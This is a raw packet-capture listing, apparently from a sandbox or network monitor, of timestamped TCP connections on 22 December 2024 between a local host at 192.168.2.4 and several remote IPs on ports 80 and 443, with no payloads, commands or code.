                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.406949997 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.407001972 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.408070087 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.408114910 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.408206940 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.408251047 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.409245968 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.409296036 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.409332037 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.409373999 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.410429001 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.410474062 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.410552979 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.410598040 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.411547899 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.411592007 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.411715984 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.411767006 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.412739992 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.412789106 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.412854910 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.412904978 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.413706064 CET44349831104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.413747072 CET49831443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.413777113 CET44349831104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.413955927 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.414009094 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.414071083 CET44349831104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.414119005 CET49831443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.414242983 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.414290905 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.415033102 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.415132046 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.415150881 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.415201902 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.416174889 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.416229010 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.416286945 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.416343927 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.417294979 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.417350054 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.417398930 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.417460918 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.418451071 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.418502092 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.418572903 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.418625116 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.419604063 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.419667959 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.419728041 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.419780970 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.420748949 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.420799971 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.420867920 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.420913935 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.421895981 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.421931982 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.421947002 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.422004938 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.423028946 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.423079967 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.423155069 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.423199892 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.424180031 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.424227953 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.424313068 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.424374104 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.425316095 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.425410986 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.425437927 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.425487995 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.426466942 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.426517963 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.426578045 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.426629066 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.427592039 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.427640915 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.427714109 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.427762985 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.428766966 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.428817987 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.428855896 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.428898096 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.429893970 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.429946899 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.429951906 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.430001974 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.431025982 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.431078911 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.431176901 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.431230068 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.432688951 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.432723999 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.432734013 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.432769060 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.433360100 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.433413029 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.433469057 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.433526039 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.434468985 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.434518099 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.435408115 CET49831443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.435431004 CET44349831104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.435446024 CET49831443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.435451984 CET44349831104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.655158997 CET44349832172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.655236959 CET44349832172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.655306101 CET49832443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.658526897 CET49832443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.658569098 CET44349832172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.972692013 CET49837443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.972785950 CET44349837172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.972883940 CET49837443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.973762035 CET49837443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.973839045 CET44349837172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:40.187674046 CET44349837172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:40.187886953 CET49837443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:40.189188004 CET49837443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:40.189244032 CET44349837172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:40.189517975 CET44349837172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:40.193739891 CET49837443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:40.193739891 CET49837443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:40.193836927 CET44349837172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:40.193943024 CET49837443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:40.193979025 CET44349837172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:40.940994978 CET4982480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:40.942157984 CET4984280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:41.061327934 CET8049824185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:41.061378956 CET4982480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:41.061990976 CET8049842185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:41.062165022 CET4984280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:41.062256098 CET4984280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:41.175697088 CET44349837172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:41.175767899 CET44349837172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:41.175856113 CET49837443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:41.175945997 CET49837443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:41.175985098 CET44349837172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:41.182009935 CET8049842185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:41.754543066 CET49843443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:41.754636049 CET44349843172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:41.754714012 CET49843443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:41.755213022 CET49843443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:41.755266905 CET44349843172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:41.821017981 CET49844443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:41.821058989 CET44349844104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:41.821130991 CET49844443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:41.821959972 CET49844443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:41.821971893 CET44349844104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:42.141587973 CET4984680192.168.2.4212.193.31.8
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:42.261303902 CET8049846212.193.31.8192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:42.261435032 CET4984680192.168.2.4212.193.31.8
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:42.261593103 CET4984680192.168.2.4212.193.31.8
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:42.381190062 CET8049846212.193.31.8192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:42.398740053 CET8049842185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:42.400597095 CET4984280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:42.402025938 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:42.402199030 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:42.522735119 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:42.523083925 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:42.523189068 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:42.523338079 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:42.523310900 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:42.643259048 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:42.966989994 CET44349843172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:42.967083931 CET49843443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:42.973860979 CET49843443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:42.973916054 CET44349843172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:42.974184036 CET44349843172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:42.979159117 CET49843443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:42.979231119 CET49843443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:42.979264021 CET44349843172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.035660982 CET44349844104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.035757065 CET49844443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.036911011 CET49844443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.036921024 CET44349844104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.037143946 CET44349844104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.038270950 CET49844443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.038439035 CET49844443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.038467884 CET44349844104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.038547993 CET49844443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.038563013 CET44349844104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.848618984 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.848639011 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.848658085 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.848701000 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.848737955 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.848788977 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.848807096 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.848824024 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.848841906 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.848855972 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.848875046 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.848902941 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.849088907 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.849131107 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.849175930 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.849215031 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.849267960 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.849308968 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.968723059 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.968744993 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.968786001 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.968806982 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.972686052 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.972728968 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.972855091 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.972904921 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.032396078 CET44349844104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.032501936 CET44349844104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.032596111 CET49844443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.036467075 CET49844443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.036487103 CET44349844104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.040874004 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.040934086 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.041076899 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.041126013 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.044924974 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.044982910 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.045041084 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.045089960 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.051542997 CET44349843172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.051640987 CET44349843172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.051811934 CET49843443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.051812887 CET49843443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.053222895 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.053288937 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.056636095 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.056744099 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.056752920 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.056783915 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.065095901 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.065148115 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.065151930 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.065188885 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.073374987 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.073426962 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.073429108 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.073474884 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.081933022 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.081986904 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.081986904 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.082031965 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.090188980 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.090243101 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.090264082 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.090306997 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.098659992 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.098714113 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.098725080 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.098756075 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.106972933 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.107023001 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.107023001 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.107073069 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.115433931 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.115483999 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.115550995 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.115592957 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.122350931 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.122397900 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.122469902 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.122534990 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.129635096 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.129684925 CET4985180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.146970987 CET49852443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.147011042 CET44349852104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.147078991 CET49852443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.147403002 CET49852443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.147413969 CET44349852104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.232947111 CET804985131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:44.233023882 CET4985180192.168.2.431.41.244.11
